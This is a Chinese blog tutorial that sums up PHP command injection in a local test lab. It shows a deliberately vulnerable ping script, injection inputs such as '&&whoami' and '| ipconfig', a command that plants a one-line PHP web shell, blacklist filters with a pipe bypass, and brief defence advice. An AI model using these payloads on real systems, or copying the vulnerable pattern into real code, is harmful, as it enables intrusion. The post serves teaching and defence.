<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="前言今天把系统重装了一遍，起因经过不想说什么= =。由于下午都在安环境和打补丁，也就只有晚上能学习一下。把命令注入学习总结了一遍 正文漏洞产生的原因由于开发人员使用脚本语言提供的命令执行操作，过滤又不完善用户又可以只有控制输入的变量。导致了变量可控，造成命令注入。 漏洞测试测试环境为：win7+php5.6,使用phpstudy搭建存在漏洞的脚本12345678910111213141516171">
<meta name="keywords" content="Writing">
<meta property="og:type" content="article">
<meta property="og:title" content="Command injection summary">
<meta property="og:url" content="http://422926799.github.io/posts/e2532565.html">
<meta property="og:site_name" content="九世的博客">
<meta property="og:description" content="前言今天把系统重装了一遍，起因经过不想说什么= =。由于下午都在安环境和打补丁，也就只有晚上能学习一下。把命令注入学习总结了一遍 正文漏洞产生的原因由于开发人员使用脚本语言提供的命令执行操作，过滤又不完善用户又可以只有控制输入的变量。导致了变量可控，造成命令注入。 漏洞测试测试环境为：win7+php5.6,使用phpstudy搭建存在漏洞的脚本12345678910111213141516171">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://img.mp.itc.cn/upload/20170204/e5391a3c2cf145b18b5c6b56b7930b20_th.jpeg">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/29/kQ4lSP.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/29/kQ40S0.md.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/29/kQ4TmD.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/29/kQ57vV.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/29/kQ5zCR.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/29/kQLxcd.png">
<meta property="og:updated_time" content="2019-04-19T12:36:16.127Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Command injection summary">
<meta name="twitter:description" content="前言今天把系统重装了一遍，起因经过不想说什么= =。由于下午都在安环境和打补丁，也就只有晚上能学习一下。把命令注入学习总结了一遍 正文漏洞产生的原因由于开发人员使用脚本语言提供的命令执行操作，过滤又不完善用户又可以只有控制输入的变量。导致了变量可控，造成命令注入。 漏洞测试测试环境为：win7+php5.6,使用phpstudy搭建存在漏洞的脚本12345678910111213141516171">
<meta name="twitter:image" content="http://img.mp.itc.cn/upload/20170204/e5391a3c2cf145b18b5c6b56b7930b20_th.jpeg">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Command injection summary</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/Search">搜索</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/4e5e3ee5.html"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/178a3f65.html"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://422926799.github.io/posts/e2532565.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://422926799.github.io/posts/e2532565.html&text=Command injection summary"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://422926799.github.io/posts/e2532565.html&is_video=false&description=Command injection summary"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Command injection summary&body=Check out this article: http://422926799.github.io/posts/e2532565.html"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://422926799.github.io/posts/e2532565.html&name=Command injection summary&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#正文"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Command injection summary
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">九世的博客</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-01-29T14:56:40.000Z" itemprop="datePublished">2019-01-29</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/Writing/">Writing</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>今天把系统重装了一遍，起因经过不想说什么= =。由于下午都在安环境和打补丁，也就只有晚上能学习一下。把命令注入学习总结了一遍<br><img src="http://img.mp.itc.cn/upload/20170204/e5391a3c2cf145b18b5c6b56b7930b20_th.jpeg" alt=""></p>
<h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p><b>漏洞产生的原因</b><br>由于开发人员使用脚本语言提供的命令执行操作，过滤又不完善用户又可以只有控制输入的变量。导致了变量可控，造成命令注入。</p>
<p><b>漏洞测试</b><br>测试环境为：win7+php5.6,使用phpstudy搭建<br>存在漏洞的脚本<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;命令注入测试&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;p&gt;输入IP&lt;/p&gt;</span><br><span class="line">&lt;form method=&quot;GET&quot; action=&quot;&lt;?php echo $_SERVER[&apos;PHP_SELF&apos;];?&gt;&quot;&gt;</span><br><span class="line">    IP:&lt;input name=&quot;host&quot; type=&quot;text&quot; required&gt;&lt;br&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; value=&quot;提交&quot;&gt;</span><br><span class="line">    &lt;p id=&quot;demo&quot;&gt;我是结果&lt;/p&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">header(&quot;Content-type: text/html;charset=utf-8&quot;);</span><br><span class="line">if(isset($_GET[&apos;host&apos;]))&#123;</span><br><span class="line">    $ud=$_GET[&apos;host&apos;];</span><br><span class="line">    $zx=system(&quot;ping &quot;.$ud);</span><br><span class="line">    echo $zx;</span><br><span class="line">    echo &quot;&lt;script&gt;document.getElementById(&apos;demo&apos;).innerText=$zx&lt;/script&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>上面这个例子可以看到无任何过滤，输入变量又可控，导致可以被用户任意执行命令<br><img src="https://s2.ax1x.com/2019/01/29/kQ4lSP.png" alt="kQ4lSP.png"><br>输入：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1&amp;&amp;dir</span><br></pre></td></tr></table></figure></p>
<p><img src="https://s2.ax1x.com/2019/01/29/kQ40S0.md.png" alt="kQ40S0.md.png"><br>查看权限：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1&amp;&amp;whoami</span><br></pre></td></tr></table></figure></p>
<p><img src="https://s2.ax1x.com/2019/01/29/kQ4TmD.png" alt="kQ4TmD.png"></p>
<p>反弹shell<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;&lt;?php @assert($_GET[_]);?&gt;&quot; &gt;&gt; zz.php</span><br></pre></td></tr></table></figure></p>
<p><img src="https://s2.ax1x.com/2019/01/29/kQ57vV.png" alt="kQ57vV.png"></p>
<p><img src="https://s2.ax1x.com/2019/01/29/kQ5zCR.png" alt="kQ5zCR.png"></p>
<p><b>绕过过滤</b><br>一些程序员为了防止这种情况的发生，进行了一定的过滤<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;命令注入测试&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;p&gt;输入IP&lt;/p&gt;</span><br><span class="line">&lt;form method=&quot;GET&quot; action=&quot;&lt;?php echo $_SERVER[&apos;PHP_SELF&apos;];?&gt;&quot;&gt;</span><br><span class="line">    IP:&lt;input name=&quot;host&quot; type=&quot;text&quot; required&gt;&lt;br&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; value=&quot;提交&quot;&gt;</span><br><span class="line">    &lt;p id=&quot;demo&quot;&gt;我是结果&lt;/p&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">header(&quot;Content-type: text/html;charset=utf-8&quot;);</span><br><span class="line">if(isset($_GET[&apos;host&apos;]))&#123;</span><br><span class="line">    $ud=$_GET[&apos;host&apos;];</span><br><span class="line">    $j=check($ud);</span><br><span class="line">    echo &quot;payload：$j&quot;;</span><br><span class="line">    echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">    $zx=system(&quot;ping &quot;.$j);</span><br><span class="line">    echo $zx;</span><br><span class="line">    echo &quot;&lt;script&gt;document.getElementById(&apos;demo&apos;).innerText=$zx&lt;/script&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">function check($v)&#123;</span><br><span class="line">    $black_list=array(&apos;;&apos;=&gt;&apos;&apos;,&apos;&amp;&apos;=&gt;&apos;&apos;);</span><br><span class="line">    $th=str_replace(array_keys($black_list),$black_list,$v); /*读取黑名单数组里面的key，替换为黑名单里面的值也就是空*/</span><br><span class="line">    return $th;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>&amp;和；被过滤掉了，那么我们用|代替<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 | ipconfig</span><br></pre></td></tr></table></figure></p>
<p><img src="https://s2.ax1x.com/2019/01/29/kQLxcd.png" alt="kQLxcd.png"></p>
<p>过滤更严谨一点<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;命令注入测试&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;p&gt;输入IP&lt;/p&gt;</span><br><span class="line">&lt;form method=&quot;GET&quot; action=&quot;&lt;?php echo $_SERVER[&apos;PHP_SELF&apos;];?&gt;&quot;&gt;</span><br><span class="line">    IP:&lt;input name=&quot;host&quot; type=&quot;text&quot; required&gt;&lt;br&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; value=&quot;提交&quot;&gt;</span><br><span class="line">    &lt;p id=&quot;demo&quot;&gt;我是结果&lt;/p&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">header(&quot;Content-type: text/html;charset=utf-8&quot;);</span><br><span class="line">if(isset($_GET[&apos;host&apos;]))&#123;</span><br><span class="line">    $ud=$_GET[&apos;host&apos;];</span><br><span class="line">    $j=check($ud);</span><br><span class="line">    echo &quot;payload：$j&quot;;</span><br><span class="line">    echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">    $zx=system(&quot;ping &quot;.$j);</span><br><span class="line">    echo $zx;</span><br><span class="line">    echo &quot;&lt;script&gt;document.getElementById(&apos;demo&apos;).innerText=$zx&lt;/script&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">function check($v)&#123;</span><br><span class="line">    $black_list=array(&apos;;&apos;=&gt;&apos;&apos;,&apos;&amp;&apos;=&gt;&apos;&apos;,&apos;||&apos;=&gt;&apos;&apos;,&apos;|&apos;=&gt;&apos;&apos;,&apos;)&apos;=&gt;&apos;&apos;,&apos;(&apos;=&gt;&apos;&apos;);</span><br><span class="line">    $th=str_replace(array_keys($black_list),$black_list,$v); /*读取黑名单数组里面的key，替换为黑名单里面的值也就是空*/</span><br><span class="line">    return $th;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>或许这样可以防御大部分攻击，但是并不能完全保证不会被FUZZ绕过，而且未来说不定也会有办法什么之类的。<br>防御方案有两个：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.在获取用户输入后，用正则匹配出要进行命令执行的</span><br><span class="line">2.加入token机制，表单限制为只能输入数字</span><br></pre></td></tr></table></figure></p>
<p>转载请声明：转自422926799.github.io</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/Search">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#正文"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://422926799.github.io/posts/e2532565.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://422926799.github.io/posts/e2532565.html&text=Command injection summary"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://422926799.github.io/posts/e2532565.html&is_video=false&description=Command injection summary"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Command injection summary&body=Check out this article: http://422926799.github.io/posts/e2532565.html"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://422926799.github.io/posts/e2532565.html&title=Command injection summary"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://422926799.github.io/posts/e2532565.html&name=Command injection summary&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 九世
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/Search">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
